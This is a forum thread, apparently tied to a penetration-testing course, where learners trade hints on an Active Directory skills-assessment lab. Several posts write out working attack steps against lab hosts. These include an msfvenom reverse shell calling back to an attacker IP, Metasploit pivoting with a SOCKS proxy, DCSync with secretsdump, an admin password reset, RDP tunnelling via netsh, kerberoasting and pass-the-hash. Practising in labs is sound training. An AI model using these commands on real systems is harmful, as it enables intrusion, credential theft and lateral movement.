This is also a good reference to the above mentione subject matter.
2 Likes
Hi,
I got pretty stuck with the last flag.
I managed to perform the DCSync but can’t authenticate with the Domain Admins hashes. While using Rubeus to get a TGT I receive the following Error message:
KRB-ERROR (23) : KDC_ERR_KEY_EXPIRED
It seems the password and therefor the kerberos key/hash are expired. Is this intended?
Did I overlook another user with logon access to the DC?
Thanks in advance.
Well Ive tried to use metasploit now a few times to no avail. sessions dont stay open.
I tried to do it through the Antak webshell, i also used nc to get a stable shell first and then try to to open a second shell to mesfconsole using the exploit/multi/handler with the intenet to use the post shell_to _meterpreter to upgrade it. Unfortunately that did not stay open long enough.
the only stable shell i was able to get was a nc to nc shell sending cmd.exe to the attack box.
so now im guessing i have to do manual port forwarding and use proxychsains?
thoughts anyone?
Was able to get the 3rd answer with Enter and Invoke using powershell. Now i will investigate Active Directory - Skills Assessment I - #34 by Rapunzel3000
to try and figure out the rest! was trying to get metrepreter but no such luck.
1 Like
How did you get Metrepter to work. I tried using the generic multi/handler from metasploit and then using nc shell via Antak web shell, and i tried geting a regular nc to nc shell first and then sending a second shell to meterpreter but i was not successfull.
I want to do this also because i too have failed to get the cleartext, powerbview, or anything else to work via powershell remote.
give me a nudge in the right direction please!
Metasplot works when using payload generic shell, when ever you try windows/shell/reverse_tcp it dosent work.
how did you do this?
Can someone give a nudge? Been at this from last night!
Hello,
For Meterpreter Autoroute I sticked to the commands shown in the Pivoting & Port Forwarding Module. Can you spot a difference? Maybe this is related to your payload configuration?
Also use your own Kali VM by any means. Pwnbox causes a lot of trouble with proxying.
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.16.16 LPORT=8080 -f exe > shell.exe
172.16.6.50 -> MS01
172.16.6.100 -> Webwin01
172.16.6.3 -> DC
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
msf6 exploit(multi/handler) > run
Invoke-Expression -Command "c:\shell.exe"
msf > use post/multi/manage/shell_to_meterpreter
msf post(shell_to_meterpreter) > show options
... show and set options ...
msf post(shell_to_meterpreter) > set SESSION session-id
set lhost 10.10.16.16
msf post(shell_to_meterpreter) > run
sessions -i 2
msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 2
SESSION => 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.6.0
SUBNET => 172.16.5.0
msf6 post(multi/manage/autoroute) > run
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
SRVPORT => 9050
msf6 auxiliary(server/socks_proxy) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf6 auxiliary(server/socks_proxy) > set version 4a
version => 4a
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
sudo nano /etc/proxychains.conf
run autoroute -p
sudo proxychains nmap 172.16.6.50 -sT -Pn -n --top-ports=10
proxychains secretsdump.py -outputfile hashes -just-dc INLANEFREIGHT/tpetty@172.16.6.3
1 Like
idk who needs to read this but I was able to create a nice RDP tunnel to MS01 from my linux attack host using these simple steps which u can learn from the pivoting and tunneling module too. if you prefer a windows experience try these tricks.
First, from the webshell, set the registry key so we can log in
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
dont know any creds on the box so let’s just change the local admin’s pass, from the webshell
net user administrator newpass
now, from the linux attack host, log into a very limited cmd shell on WEB-WIN01 to setup a tunnel, where WEB-WIN01 is also the 10.X.X.X ip address of the webshell
xfreerdp /v:<WEB-WIN01> /u:administrator /p:newpass /cert:ignore
in the new RDP cmd window, after using nslookup to discover MS01 is 172.16.6.50 , make a tunnel with the netsh command which links WEB01’s 10.X.X.X reachable address on port 1515 to MS01’s RDP port 3389, like this:
netsh interface portproxy add v4tov4 listenport=1515 listenaddress=<WEB-WIN01> connectport=3389 connectaddress=172.16.6.50
RDP into MS01 from our attack host through the tunnel we just made to MS01 on WEB-WIN01 port 1515:
xfreerdp /v:<WEB-WIN01>:1515 /u:svc_XXX /p:XXckX7 /cert:ignore
it’s just so nice to copy and paste powershell scripts or exes like mimikatz and psexec with the clipboard of my linux machine and into the RDP window of MS01. if you prefer a windows experience to conduct the attacks you can use these tricks to make it easier on yourself.
16 Likes
any help on the DCsync attack for the last step of the assessment? thank you
1 Like
@meerrk4t Sure thing! What do you need help with exactly? Did you get the Administrator and krbtgt NTLM hashes?
hey thanks for replying…no i did not get that yet… i’ve tried secretdumps.py but the dc was not reachable…and mimikatz did not work on either ms01 or web-win01, always got an error message.
1 Like
Mimikatz must be run as an administrator in an elevated window (meaning run Powershell as as administrator).
Did you get the password for tpetty? tpetty has the rights to run the dcsync.
oh thank you got it now, i have both ntlm hashes for krbtgt and the administrator… now i’m out of ideas on how to get to the dc honestly…tried to crack the admin hash with hashcat and rockyou.txt but nothing
yes i do have t***y password
1 Like
I sent you a message.
I used “chisel.exe” to see the other machines on the 172.16.6.x network.
I instead used the “crackmapexec” tool with the “–lsa” option to see if any credentials were left in memory.
If you have the hash of “Administrator” you can do a Pass The Hash. I tried to crack the hash and I couldn’t, but doing Pass The Hash you can see the flag.txt. By the way, if it helps anyone, I got the hash of “Administrator” using the tool “impacket-secretsdump” and “Chisel.exe”.
1 Like
niente,nada,nothing, trying to open the port on MS01 but nothing helps, tried lazagne with NT SYSTEM shell, got mscache, got 4 hashes with winpeas,but no cleartext passwords.
Tried like every command of my notes of the module.
Am badly stuck. Tried both Windows and Linux way. In linux can run nmap with proxychains,the ports are closed and it refuses connection with proxychains secretdump.py. Would be really grateful if someone could give a nudge.
ciao, am on the tpetty cleartext password, can’t find it and can’t open the ports
plus,running Rubeus-1.5.0.exe kerberoast /outfiles:hashes.txt [/user:tpetty] [/domain:INLANEFREIGHT.LOCAL] [/dc:DC01.INLANEFREIGHT.LOCAL] i got many new users for the future steps